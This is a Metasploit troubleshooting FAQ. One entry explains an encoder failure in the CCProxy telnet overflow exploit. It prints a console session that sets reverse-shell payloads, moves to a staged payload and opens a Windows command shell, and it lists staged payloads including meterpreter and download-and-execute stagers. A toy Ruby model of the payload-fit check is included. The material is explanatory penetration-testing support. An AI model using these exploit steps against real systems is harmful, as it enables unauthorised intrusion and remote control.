Metasploit FAQs

Installation

Errors

no such file to load -- openssl (LoadError)

Q: When I run Metasploit for the first time, I get the error: no such file to load -- openssl (LoadError)

Example:

    [~/Metasploit]# ./msfgui
    ./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
            from ./lib/rex/socket/ssl_tcp_server.rb:4
            from ./lib/rex/socket/comm/local.rb:5:in `require'
            from ./lib/rex/socket/comm/local.rb:5
            from ./lib/rex/socket.rb:22:in `require'
            from ./lib/rex/socket.rb:22
            from ./lib/rex.rb:71:in `require'
            from ./lib/rex.rb:71
            from ./msfgui:10:in `require'
            from ./msfgui:10

A: Metasploit requires the Ruby implementation of OpenSSL, not the standard C implementation of OpenSSL used by Apache etc. Install the required ruby-openssl library.

Example (for Debian; check your OS or try using gem):

    pwebster@metasploit:~$ apt-cache search ruby | grep openssl
    libopenssl-ruby - OpenSSL interface for Ruby
    libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8
    libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9
    pwebster@metasploit:~# apt-get install libopenssl-ruby

Exploit Modules

Errors

Exploit failed: No encoders encoded the buffer successfully

Q: After setting all the parameters required for an exploit module and running exploit, I receive the following error: [-] Exploit failed: No encoders encoded the buffer successfully.

Example:

    msf > use windows/proxy/ccproxy_telnet_ping
    msf exploit(ccproxy_telnet_ping) > info

           Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
        Version: $Revision$
       Platform: Windows
     Privileged: No
        License: Metasploit Framework License

    Provided by:
      Patrick Webster

    Available targets:
      Id  Name
      --  ----
      0   Windows 2000 Pro SP0 - English
      1   Windows 2000 Pro SP1 - English
      2   Windows 2000 Pro SP2 - English
      3   Windows 2000 Pro SP3 - English
      4   Windows 2000 Pro SP4 - English
      5   Windows XP SP0/1 - English
      6   Windows 2003 Server SP0/1 - English

    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST  127.0.0.1        yes       The target address
      RPORT  23               yes       The target port

    Payload information:
      Space: 200
      Avoid: 5 characters

    Description:
      This module exploits the YoungZSoft CCProxy

    msf exploit(ccproxy_telnet_ping) > set TARGET 4
    TARGET => 4
    msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
    LHOST => 127.0.0.1
    msf exploit(ccproxy_telnet_ping) > check
    [*] The target appears to be vulnerable.
    msf exploit(ccproxy_telnet_ping) > exploit
    [-] Exploit failed: No encoders encoded the buffer successfully.

A: The payloads available (show payloads) are determined by the memory space ('Space') that the exploit has available for the payload. In the example, the space for the payload is 'Space: 200'.

However, the target application does not allow certain characters to be used (usually the null character 0x00, as it marks the end of a string [character array]). In the example, the payload may not contain five characters: 'Avoid: 5 characters'.

When you run the exploit, the payload generator tries to fit the payload into a space of 200 bytes while excluding the five specified characters. This is not always possible, and when it is not, the result is the error: No encoders encoded the buffer successfully.

However, all is not lost. The Metasploit Framework includes support for staged payloads.

A staged payload is a significantly smaller payload which, instead of executing the desired action (such as a reverse shell), starts a staging platform that the rest of the payload can then be added to. So in our example, instead of sending a complete reverse shell, it will:

- Create the staging platform.
- Allocate enough memory to hold the desired payload.
- Get the rest of the payload from you.
- Execute the payload as a whole.

Generally, staged payloads are denoted by a '/' after the desired payload name. Some examples are:

    windows/dllinject/reverse_tcp       Windows Inject DLL, Reverse TCP Stager
    windows/download_exec/bind_tcp      Windows Executable Download and Execute, Bind TCP Stager
    windows/exec/find_tag               Windows Execute Command, Find Tag Ordinal Stager
    windows/meterpreter/reverse_tcp     Windows Meterpreter, Reverse TCP Stager
    windows/shell/reverse_tcp           Windows Command Shell, Reverse TCP Stager
    windows/upexec/bind_tcp             Windows Upload/Execute, Bind TCP Stager
    windows/vncinject/reverse_ord_tcp   Windows VNC Inject, Reverse Ordinal TCP Stager

Now that we know a complete (unstaged) payload cannot always be used, we can use a staged one in such cases:

    ...
    msf exploit(ccproxy_telnet_ping) > exploit
    [-] Exploit failed: No encoders encoded the buffer successfully.
    msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
    PAYLOAD => windows/shell/reverse_tcp
    msf exploit(ccproxy_telnet_ping) > exploit
    [*] Started reverse handler
    [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
    [*] Sending stage (474 bytes)
    [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\Documents and Settings\Administrator>
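The answer above comes down to a fit check: the payload, plus any decoder it needs, must fit in 'Space' without containing an avoided character. The following Ruby sketch is an added illustration, not code from the FAQ or from the Metasploit Framework. It models that check with a toy single-byte XOR encoder; the five avoided bytes, the 24-byte decoder overhead and the payload stand-ins are all constructed assumptions.

```ruby
# Added illustration, not Metasploit source: a toy model of the fit check.
SPACE = 200                                       # 'Space: 200' from the module info above
BADCHARS = [0x00, 0x0a, 0x0d, 0x20, 0x40].freeze  # constructed; the page only says "5 characters"
STUB_OVERHEAD = 24                                # assumed decoder stub size (hypothetical)

# Return the first XOR key for which neither the key itself nor any encoded
# byte is an avoided character, or nil when no such key exists.
def find_xor_key(payload, bad)
  (1..255).find do |key|
    next false if bad.include?(key)
    payload.each_byte.none? { |b| bad.include?(b ^ key) }
  end
end

# Returns [:ok, key] (key is nil when no encoding was needed) or
# [:fail, reason]. Both failure reasons surface to the user as the same
# "No encoders encoded the buffer successfully" message.
def try_encode(payload, space: SPACE, bad: BADCHARS)
  needs_encoding = payload.each_byte.any? { |b| bad.include?(b) }
  size = payload.bytesize + (needs_encoding ? STUB_OVERHEAD : 0)
  return [:fail, :too_large] if size > space
  return [:ok, nil] unless needs_encoding

  key = find_xor_key(payload, bad)
  key ? [:ok, key] : [:fail, :no_clean_key]
end

# Constructed stand-ins, not real payload bytes:
SINGLE = Array.new(280) { |i| i % 256 }.pack('C*') # complete payload, uses every byte value
STAGER = (0...120).to_a.pack('C*')                 # small first stage

if __FILE__ == $PROGRAM_NAME
  p try_encode(SINGLE)             # too big for Space once the stub is added
  p try_encode(SINGLE, space: 400) # fits, but every key yields an avoided byte
  p try_encode(STAGER)             # small enough, and a clean key exists
end
```

The 474-byte stage reported in the session above never goes through this check: it is sent over the connection after the stager is already running, which is why it can be larger than 'Space'.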
